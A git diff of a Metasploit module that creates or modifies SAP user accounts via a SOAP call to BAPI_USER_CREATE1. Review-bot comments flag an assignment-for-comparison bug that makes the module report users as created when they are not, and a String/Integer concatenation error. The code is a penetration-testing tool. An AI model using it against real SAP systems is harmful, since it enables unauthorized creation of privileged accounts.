diff --git a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb index 682e9717ee..9f8fb3f809 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb @@ -6,13 +6,13 @@ ## ## -# This module is based on, inspired by, or is a port of a plugin available in -# the Onapsis Bizploit Opensource ERP Penetration Testing framework - +# This module is based on, inspired by, or is a port of a plugin available in +# the Onapsis Bizploit Opensource ERP Penetration Testing framework - # http://www.onapsis.com/research-free-solutions.php. -# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts +# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts # in producing the Metasploit modules and was happy to share his knowledge and -# experience - a very cool guy. I'd also like to thank Chris John Riley, -# Ian de Villiers and Joris van de Vis who have Beta tested the modules and +# experience - a very cool guy. I'd also like to thank Chris John Riley, +# Ian de Villiers and Joris van de Vis who have Beta tested the modules and # provided excellent feedback. Some people just seem to enjoy hacking SAP :) ## @@ -23,16 +23,15 @@ class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'SAP SOAP RFC BAPI_USER_CREATE1', - 'Version' => '$Revision$', 'Description' => %q{ This module calls the RFC BAPI_USER_CREATE1 module (via SOAP). The module can be used for creating/modifying users. }, - 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]], + 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]], 'Author' => ['Agnivesh Sathasivam','nmonkee'], 'License' => BSD_LICENSE ) 
@@ -46,7 +45,7 @@ class Metasploit4 < Msf::Auxiliary OptString.new('BAPI_USER',[false,'Username for the account (Usrename in upper case only. Default is ADMIN)', 'ADMIN']) ], self.class) end - + def run_host(ip) data = '' data << '' @@ -75,10 +74,10 @@ class Metasploit4 < Msf::Auxiliary 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], 'Authorization' => 'Basic ' + user_pass, - 'Content-Type' => 'text/xml; charset=UTF-8', + 'Content-Type' => 'text/xml; charset=UTF-8' } }, 45) - if res.code = 200 + if res and res.code = 200 if res.body =~ /

Logon failed<\/h1>/ print_error("[SAP] #{ip}:#{rport} - Logon failed") elsif res.body =~ /faultstring/ @@ -89,9 +88,8 @@ class Metasploit4 < Msf::Auxiliary print_good("[SAP] #{ip}:#{rport} - User '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}' created") end else - print_error("[SAP] #{ip}:#{rport} - Couldn't access " + ip + ":" + port ) - print_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) - print_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) + print_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) if res + print_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) if res end rescue ::Rex::ConnectionError print_error("[SAP] #{ip}:#{rport} - Unable to connect")
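Review bot: The new condition `if res and res.code = 200` assigns 200 to `res.code` instead of comparing it, so any response that arrives takes the success path regardless of its real status. It should read `if res && res.code == 200`, which also replaces the low-precedence `and`. As written, a 401 or 500 reply whose body matches neither "Logon failed" nor "faultstring" appears to fall through to the "created" message in the next hunk, so the module can report a user that was never created. The `else` branch can then only be reached when `res` is nil. `run_host` begins before this hunk and continues past it.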
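Review bot: In the else branch, `"... - Error code: " + res.code` concatenates a String with what is presumably an Integer status code (the condition above compares it with 200), which would raise TypeError instead of printing. Interpolation avoids that: `print_error("[SAP] #{ip}:#{rport} - Error code: #{res.code}") if res`. When `res` is nil, both `if res` lines are skipped and the branch prints nothing, so a host that never answered is silently dropped from the output. An unconditional `print_error("[SAP] #{ip}:#{rport} - No response")` for that case would keep the scan results honest. The `begin` that pairs with the `rescue ::Rex::ConnectionError` shown here lies outside the hunk.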